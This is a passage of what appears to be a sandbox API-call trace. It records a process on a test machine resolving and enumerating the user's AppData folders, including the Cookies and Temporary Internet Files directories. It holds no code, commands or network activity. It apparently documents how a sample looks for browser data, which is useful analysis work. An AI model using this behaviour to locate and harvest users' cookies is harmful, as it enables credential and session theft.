ftLastAccessTime.dwLowDateTime=0x426ba7c0, ftLastAccessTime.dwHighDateTime=0x1d7b065, ftLastWriteTime.dwLowDateTime=0x426ba7c0, ftLastWriteTime.dwHighDateTime=0x1d7b065, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft", cAlternateFileName="MICROS~1")) returned 0x10eeeb0 [0173.934] FindNextFileW (in: hFindFile=0x10eeeb0, lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x794f55f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x426ba7c0, ftLastAccessTime.dwHighDateTime=0x1d7b065, ftLastWriteTime.dwLowDateTime=0x426ba7c0, ftLastWriteTime.dwHighDateTime=0x1d7b065, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft", cAlternateFileName="MICROS~1")) returned 0 [0173.935] GetLastError () returned 0x12 [0173.935] FindClose (in: hFindFile=0x10eeeb0 | out: hFindFile=0x10eeeb0) returned 1 [0173.935] SysReAllocStringLen (in: pbstr=0x28fadc*="c:\\Users\\kEecfMwgj\\AppData\\Roaming\\", psz="c:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft", len=0x2c | out: pbstr=0x28fadc*="c:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft") returned 1 [0173.935] SysReAllocStringLen (in: pbstr=0x28fdd8*="c:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft", psz="c:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\", len=0x2d | out: pbstr=0x28fdd8*="c:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\") returned 1 [0173.935] SysReAllocStringLen (in: pbstr=0x28fae8*="microsoft", psz="windows", len=0x7 | out: pbstr=0x28fae8*="windows") returned 1 [0173.936] FindFirstFileW (in: lpFileName="c:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\windows" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows"), lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x794f55f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x795b3cd0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xf96b9c4c, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows", cAlternateFileName="")) returned 0x10eeeb0 [0173.936] FindNextFileW (in: hFindFile=0x10eeeb0, lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x794f55f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x795b3cd0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xf96b9c4c, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows", cAlternateFileName="")) returned 0 [0173.936] GetLastError () returned 0x12 [0173.936] FindClose (in: hFindFile=0x10eeeb0 | out: hFindFile=0x10eeeb0) returned 1 [0173.936] SysReAllocStringLen (in: pbstr=0x28fadc*="c:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\", psz="c:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows", len=0x34 | out: pbstr=0x28fadc*="c:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows") returned 1 [0173.937] SysReAllocStringLen (in: pbstr=0x28fdd8*="c:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows", psz="c:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\", len=0x35 | out: pbstr=0x28fdd8*="c:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\") returned 1 [0173.937] SysReAllocStringLen (in: pbstr=0x28fae8*="windows", psz="cookies", len=0x7 | out: pbstr=0x28fae8*="cookies") returned 1 [0173.937] FindFirstFileW (in: lpFileName="c:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\cookies" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\cookies"), lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x795b3cd0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x76abed20, ftLastAccessTime.dwHighDateTime=0x1d7b064, ftLastWriteTime.dwLowDateTime=0x76abed20, ftLastWriteTime.dwHighDateTime=0x1d7b064, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Cookies", cAlternateFileName="")) returned 0x10eeeb0 [0173.937] FindNextFileW (in: hFindFile=0x10eeeb0, lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x795b3cd0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x76abed20, ftLastAccessTime.dwHighDateTime=0x1d7b064, ftLastWriteTime.dwLowDateTime=0x76abed20, ftLastWriteTime.dwHighDateTime=0x1d7b064, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Cookies", cAlternateFileName="")) returned 0 [0173.938] GetLastError () returned 0x12 [0173.938] FindClose (in: hFindFile=0x10eeeb0 | out: hFindFile=0x10eeeb0) returned 1 [0173.938] SysReAllocStringLen (in: pbstr=0x28fadc*="c:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\", psz="c:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Cookies", len=0x3c | out: pbstr=0x28fadc*="c:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Cookies") returned 1 [0173.938] SysReAllocStringLen (in: pbstr=0x28fdd8*="c:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Cookies", psz="c:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\", len=0x3d | out: pbstr=0x28fdd8*="c:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\") returned 1 [0173.943] SysReAllocStringLen (in: pbstr=0x28fad8*=0x0, psz="c:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\", len=0x3d | out: pbstr=0x28fad8*="c:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\") returned 1 [0173.944] SysReAllocStringLen (in: pbstr=0x28fdd8*="c:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\", psz="c:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Cookies", len=0x3c | out: pbstr=0x28fdd8*="c:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Cookies") returned 1 [0173.944] SysReAllocStringLen (in: pbstr=0x28fddc*=0x0, psz="c:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Cookies", len=0x3c | out: pbstr=0x28fddc*="c:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Cookies") returned 1 [0173.944] SysReAllocStringLen (in: pbstr=0x3420080*=0x0, psz="c:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\", len=0x3d | out: pbstr=0x3420080*="c:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\") returned 1 [0173.944] SHGetFolderPathW (in: hwnd=0x0, csidl=32, hToken=0x0, dwFlags=0x0, pszPath=0x3423b40 | out: pszPath="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files") returned 0x0 [0173.946] CharLowerBuffW (in: lpsz="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files", cchLength=0x4b | out: lpsz="c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\temporary internet files") returned 0x4b [0173.947] SysReAllocStringLen (in: pbstr=0x342009c*=0x0, psz="c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\temporary internet files", len=0x4b | out: pbstr=0x342009c*="c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\temporary internet files") returned 1 [0173.947] SysReAllocStringLen (in: pbstr=0x34200a0*=0x0, psz="c:", len=0x2 | out: pbstr=0x34200a0*="c:") returned 1 [0173.947] SysReAllocStringLen (in: pbstr=0x33e0834*=0x0, psz="users", len=0x5 | out: pbstr=0x33e0834*="users") returned 1 [0173.948] SysReAllocStringLen (in: pbstr=0x34200d4*=0x0, psz="keecfmwgj", len=0x9 | out: pbstr=0x34200d4*="keecfmwgj") returned 1 [0173.948] SysReAllocStringLen (in: pbstr=0x34200e0*=0x0, psz="appdata", len=0x7 | out: pbstr=0x34200e0*="appdata") returned 1 [0173.948] SysReAllocStringLen (in: pbstr=0x34200ec*=0x0, psz="local", len=0x5 | out: pbstr=0x34200ec*="local") returned 1 [0173.949] SysReAllocStringLen (in: pbstr=0x34200f8*=0x0, psz="microsoft", len=0x9 | out: pbstr=0x34200f8*="microsoft") returned 1 [0173.949] SysReAllocStringLen (in: pbstr=0x3420128*=0x0, psz="windows", len=0x7 | out: pbstr=0x3420128*="windows") returned 1 [0173.950] SysReAllocStringLen (in: pbstr=0x3420134*=0x0, psz="temporary internet files", len=0x18 | out: pbstr=0x3420134*="temporary internet files") returned 1 [0173.950] SysReAllocStringLen (in: pbstr=0x28faf0*=0x0, psz="c:", len=0x2 | out: pbstr=0x28faf0*="c:") returned 1 [0173.950] SysReAllocStringLen (in: pbstr=0x28fdcc*=0x0, psz="c:\\", len=0x3 | out: pbstr=0x28fdcc*="c:\\") returned 1 [0173.950] SysReAllocStringLen (in: pbstr=0x28fae8*=0x0, psz="users", len=0x5 | out: pbstr=0x28fae8*="users") returned 1 [0173.951] FindFirstFileW (in: lpFileName="c:\\users" (normalized: "c:\\users"), lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x791634f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x791634f0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x10ef150 [0173.951] FindNextFileW (in: hFindFile=0x10ef150, lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x791634f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x791634f0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0 [0173.951] GetLastError () returned 0x12 [0173.951] FindClose (in: hFindFile=0x10ef150 | out: hFindFile=0x10ef150) returned 1 [0173.952] SysReAllocStringLen (in: pbstr=0x28fadc*=0x0, psz="c:\\Users", len=0x8 | out: pbstr=0x28fadc*="c:\\Users") returned 1 [0173.952] SysReAllocStringLen (in: pbstr=0x28fdcc*="c:\\Users", psz="c:\\Users\\", len=0x9 | out: pbstr=0x28fdcc*="c:\\Users\\") returned 1 [0173.952] SysReAllocStringLen (in: pbstr=0x28fae8*="users", psz="keecfmwgj", len=0x9 | out: pbstr=0x28fae8*="keecfmwgj") returned 1 [0173.952] FindFirstFileW (in: lpFileName="c:\\Users\\keecfmwgj" (normalized: "c:\\users\\keecfmwgj"), lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x791634f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xf29f86d0, ftLastAccessTime.dwHighDateTime=0x1d70911, ftLastWriteTime.dwLowDateTime=0xf29f86d0, ftLastWriteTime.dwHighDateTime=0x1d70911, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="kEecfMwgj", cAlternateFileName="KEECFM~1")) returned 0x10ef150 [0173.965] FindNextFileW (in: hFindFile=0x10ef150, lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x791634f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xf29f86d0, ftLastAccessTime.dwHighDateTime=0x1d70911, ftLastWriteTime.dwLowDateTime=0xf29f86d0, ftLastWriteTime.dwHighDateTime=0x1d70911, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="kEecfMwgj", cAlternateFileName="KEECFM~1")) returned 0 [0173.966] GetLastError () returned 0x12 [0173.966] FindClose (in: hFindFile=0x10ef150 | out: hFindFile=0x10ef150) returned 1 [0173.966] SysReAllocStringLen (in: pbstr=0x28fadc*="c:\\Users\\", psz="c:\\Users\\kEecfMwgj", len=0x12 | out: pbstr=0x28fadc*="c:\\Users\\kEecfMwgj") returned 1 [0173.966] SysReAllocStringLen (in: pbstr=0x28fdcc*="c:\\Users\\kEecfMwgj", psz="c:\\Users\\kEecfMwgj\\", len=0x13 | out: pbstr=0x28fdcc*="c:\\Users\\kEecfMwgj\\") returned 1 [0173.966] SysReAllocStringLen (in: pbstr=0x28fae8*="keecfmwgj", psz="appdata", len=0x7 | out: pbstr=0x28fae8*="appdata") returned 1 [0173.967] FindFirstFileW (in: lpFileName="c:\\Users\\kEecfMwgj\\appdata" (normalized: "c:\\users\\keecfmwgj\\appdata"), lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x794f55f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79698510, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xe9bbeade, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AppData", cAlternateFileName="")) returned 0x10ef150 [0173.967] FindNextFileW (in: hFindFile=0x10ef150, lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x794f55f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79698510, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xe9bbeade, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AppData", cAlternateFileName="")) returned 0 [0173.967] GetLastError () returned 0x12 [0173.967] FindClose (in: hFindFile=0x10ef150 | out: hFindFile=0x10ef150) returned 1 [0173.967] SysReAllocStringLen (in: pbstr=0x28fadc*="c:\\Users\\kEecfMwgj\\", psz="c:\\Users\\kEecfMwgj\\AppData", len=0x1a | out: pbstr=0x28fadc*="c:\\Users\\kEecfMwgj\\AppData") returned 1 [0173.968] FindFirstFileW (in: lpFileName="c:\\Users\\kEecfMwgj\\AppData\\local" (normalized: "c:\\users\\keecfmwgj\\appdata\\local"), lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x79698510, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xe31a0b60, ftLastAccessTime.dwHighDateTime=0x1d8a6e8, ftLastWriteTime.dwLowDateTime=0xe31a0b60, ftLastWriteTime.dwHighDateTime=0x1d8a6e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Local", cAlternateFileName="")) returned 0x10ef150 [0173.968] FindNextFileW (in: hFindFile=0x10ef150, lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x79698510, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xe31a0b60, ftLastAccessTime.dwHighDateTime=0x1d8a6e8, ftLastWriteTime.dwLowDateTime=0xe31a0b60, ftLastWriteTime.dwHighDateTime=0x1d8a6e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Local", cAlternateFileName="")) returned 0 [0173.968] GetLastError () returned 0x12 [0173.968] FindClose (in: hFindFile=0x10ef150 | out: hFindFile=0x10ef150) returned 1 [0173.969] FindFirstFileW (in: lpFileName="c:\\Users\\kEecfMwgj\\AppData\\Local\\microsoft" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft"), lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x79698510, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x2cedac90, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x2cedac90, ftLastWriteTime.dwHighDateTime=0x1d70912, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft", cAlternateFileName="MICROS~1")) returned 0x10ef150 [0173.969] FindNextFileW (in: hFindFile=0x10ef150, lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x79698510, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x2cedac90, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x2cedac90, ftLastWriteTime.dwHighDateTime=0x1d70912, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft", cAlternateFileName="MICROS~1")) returned 0 [0173.969] GetLastError () returned 0x12 [0173.969] FindClose (in: hFindFile=0x10ef150 | out: hFindFile=0x10ef150) returned 1 [0173.969] FindFirstFileW (in: lpFileName="c:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\windows" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows"), lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x796be670, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xb1ed8fe0, ftLastAccessTime.dwHighDateTime=0x1d73a91, ftLastWriteTime.dwLowDateTime=0xb1ed8fe0, ftLastWriteTime.dwHighDateTime=0x1d73a91, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows", cAlternateFileName="")) returned 0x10f1338 [0173.970] FindNextFileW (in: hFindFile=0x10f1338, lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x796be670, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xb1ed8fe0, ftLastAccessTime.dwHighDateTime=0x1d73a91, ftLastWriteTime.dwLowDateTime=0xb1ed8fe0, ftLastWriteTime.dwHighDateTime=0x1d73a91, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows", cAlternateFileName="")) returned 0 [0173.970] GetLastError () returned 0x12 [0173.970] FindClose (in: hFindFile=0x10f1338 | out: hFindFile=0x10f1338) returned 1 [0173.970] FindFirstFileW (in: lpFileName="c:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\temporary internet files" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\temporary internet files"), lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x796e47d0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xb10c4320, ftLastAccessTime.dwHighDateTime=0x1d7b064, ftLastWriteTime.dwLowDateTime=0xb10c4320, ftLastWriteTime.dwHighDateTime=0x1d7b064, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Temporary Internet Files", cAlternateFileName="TEMPOR~1")) returned 0x10f1338 [0173.971] FindNextFileW (in: hFindFile=0x10f1338, lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x796e47d0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xb10c4320, ftLastAccessTime.dwHighDateTime=0x1d7b064, ftLastWriteTime.dwLowDateTime=0xb10c4320, ftLastWriteTime.dwHighDateTime=0x1d7b064, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Temporary Internet Files", cAlternateFileName="TEMPOR~1")) returned 0 [0173.971] GetLastError () returned 0x12 [0173.971] FindClose (in: hFindFile=0x10f1338 | out: hFindFile=0x10f1338) returned 1 [0173.977] SysReAllocStringLen (in: pbstr=0x28fad8*=0x0, psz="c:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\", len=0x4c | out: pbstr=0x28fad8*="c:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\") returned 1 [0173.977] SysReAllocStringLen (in: pbstr=0x28fdcc*="c:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\", psz="c:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files", len=0x4b | out: pbstr=0x28fdcc*="c:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files") returned 1 [0173.977] SysReAllocStringLen (in: pbstr=0x28fdd0*=0x0, psz="c:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files", len=0x4b | out: pbstr=0x28fdd0*="c:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files") returned 1 [0174.221] SysReAllocStringLen (in: pbstr=0x3420084*=0x0, psz="c:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\", len=0x4c | out: pbstr=0x3420084*="c:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\") returned 1 [0174.221] SHGetFolderPathW (in: hwnd=0x0, csidl=26, hToken=0x0, dwFlags=0x0, pszPath=0x3423b40 | out: pszPath="C:\\Users\\kEecfMwgj\\AppData\\Roaming") returned 0x0 [0174.222] SysReAllocStringLen (in: pbstr=0x342009c*=0x0, psz="c:\\users\\keecfmwgj\\appdata\\roaming", len=0x22 | out: pbstr=0x342009c*="c:\\users\\keecfmwgj\\appdata\\roaming") returned 1 [0174.222] SysReAllocStringLen (in: pbstr=0x34200a0*=0x0, psz="c:", len=0x2 | out: pbstr=0x34200a0*="c:") returned 1 [0174.222] SysReAllocStringLen (in: pbstr=0x33e0834*=0x0, psz="users", len=0x5 | out: pbstr=0x33e0834*="users") returned 1 [0174.223] SysReAllocStringLen (in: pbstr=0x34200d4*=0x0, psz="keecfmwgj", len=0x9 | out: pbstr=0x34200d4*="keecfmwgj") returned 1 [0174.223] SysReAllocStringLen (in: pbstr=0x34200e0*=0x0, psz="appdata", len=0x7 | out: pbstr=0x34200e0*="appdata") returned 1 [0174.223] SysReAllocStringLen (in: pbstr=0x34200ec*=0x0, psz="roaming", len=0x7 | out: pbstr=0x34200ec*="roaming") returned 1 [0174.223] SysReAllocStringLen (in: pbstr=0x28faf0*=0x0, psz="c:", len=0x2 | out: pbstr=0x28faf0*="c:") returned 1 [0174.223] SysReAllocStringLen (in: pbstr=0x28fdc0*=0x0, psz="c:\\", len=0x3 | out: pbstr=0x28fdc0*="c:\\") returned 1 [0174.223] SysReAllocStringLen (in: pbstr=0x28fae8*=0x0, psz="users", len=0x5 | out: pbstr=0x28fae8*="users") returned 1 [0174.224] FindFirstFileW (in: lpFileName="c:\\users" (normalized: "c:\\users"), lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x791634f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x791634f0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x10ef150 [0174.224] FindNextFileW (in: hFindFile=0x10ef150, lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x791634f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x791634f0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0 [0174.224] GetLastError () returned 0x12 [0174.224] FindClose (in: hFindFile=0x10ef150 | out: hFindFile=0x10ef150) returned 1 [0174.225] SysReAllocStringLen (in: pbstr=0x28fadc*=0x0, psz="c:\\Users", len=0x8 | out: pbstr=0x28fadc*="c:\\Users") returned 1 [0174.225] SysReAllocStringLen (in: pbstr=0x28fdc0*="c:\\Users", psz="c:\\Users\\", len=0x9 | out: pbstr=0x28fdc0*="c:\\Users\\") returned 1 [0174.225] SysReAllocStringLen (in: pbstr=0x28fae8*="users", psz="keecfmwgj", len=0x9 | out: pbstr=0x28fae8*="keecfmwgj") returned 1 [0174.225] FindFirstFileW (in: lpFileName="c:\\Users\\keecfmwgj" (normalized: "c:\\users\\keecfmwgj"), lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x791634f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xf29f86d0, ftLastAccessTime.dwHighDateTime=0x1d70911, ftLastWriteTime.dwLowDateTime=0xf29f86d0, ftLastWriteTime.dwHighDateTime=0x1d70911, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="kEecfMwgj", cAlternateFileName="KEECFM~1")) returned 0x10ef150 [0174.226] FindNextFileW (in: hFindFile=0x10ef150, lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x791634f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xf29f86d0, ftLastAccessTime.dwHighDateTime=0x1d70911, ftLastWriteTime.dwLowDateTime=0xf29f86d0, ftLastWriteTime.dwHighDateTime=0x1d70911, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="kEecfMwgj", cAlternateFileName="KEECFM~1")) returned 0 [0174.226] GetLastError () returned 0x12 [0174.226] FindClose (in: hFindFile=0x10ef150 | out: hFindFile=0x10ef150) returned 1 [0174.226] SysReAllocStringLen (in: pbstr=0x28fadc*="c:\\Users\\", psz="c:\\Users\\kEecfMwgj", len=0x12 | out: pbstr=0x28fadc*="c:\\Users\\kEecfMwgj") returned 1 [0174.226] SysReAllocStringLen (in: pbstr=0x28fdc0*="c:\\Users\\kEecfMwgj", psz="c:\\Users\\kEecfMwgj\\", len=0x13 | out: pbstr=0x28fdc0*="c:\\Users\\kEecfMwgj\\") returned 1 [0174.227] SysReAllocStringLen (in: pbstr=0x28fae8*="keecfmwgj", psz="appdata", len=0x7 | out: pbstr=0x28fae8*="appdata") returned 1 [0174.227] FindFirstFileW (in: lpFileName="c:\\Users\\kEecfMwgj\\appdata" (normalized: "c:\\users\\keecfmwgj\\appdata"), lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x794f55f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79698510, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xe9bbeade, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, 